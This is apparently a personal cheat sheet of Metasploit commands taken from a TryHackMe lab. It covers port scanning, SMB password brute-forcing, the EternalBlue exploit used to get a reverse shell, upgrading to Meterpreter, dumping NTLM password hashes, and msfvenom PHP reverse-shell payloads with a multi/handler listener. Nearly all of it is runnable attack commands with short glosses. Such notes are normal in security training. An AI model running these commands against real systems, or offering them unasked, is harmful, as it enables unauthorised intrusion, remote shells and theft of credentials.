Metasploit

	msfconsole
start metasploit
	search portscan
search for keyword portscan
	use 5
use item module 5 from search
	show options
	nmap -sS [ip]
	set RHOSTS [ip]
	search udp_sweep
	run
	setg RHOSTS [ip]
set global RHOSTS

Samba Brute Force

	search smb_login
	use 0
use found module
	set pass_file [password list]
	set user [user to test]
	exploit
reveals password if it's in the list

Database

	systemctl start postgresql
	msfdb init
	msfconsole
	db_status
	workspace -a tryhackme

	db_nmap -sV -p- [ip]
nmap's to database
	hosts
shows found hosts and some information
	services
shows found services
	hosts -R
sets RHOSTS to list of ips in hosts db

Samba Exploit
	use auxiliary/scanner/smb/smb_ms17_010
	services -S netbios
lists netbios information
	hosts -R
	run
	show payloads
shows available exploits
	set payload 2
choose shell_reverse_tcp
	show options
look at optins and make sure LHOST is set to current localhost
	exploit
pops shell using eternalblue
	CTRL-Z
backgrounds session
	sessions
lists sessions
	sessions -i [session number]
sets session to interact with
	session -C [session number]
converts session into metapreter session
	search hashdump
	use post/windows/gather/hashdump
will dump NTLM hashes from password database

MSFVenom generates payloads
	msfvenom -l payloads
use from $ to list all possible payloads
	msfvenom --list formats
shows formats to generate standalone executables for meterpreter (eg python)
	msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
-e encodes as php base 64 with a raw output
	msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php
creates a php shell which needs to be edited
** fix <?php at beginning of file and ?> at end of file
	msfconsole
	use exploit/multi/handler
supports metasploit payloads
	set payload php/reverse_php
uses php reverse shell we just created
	set lhost [local ip]
	set lport [local port]
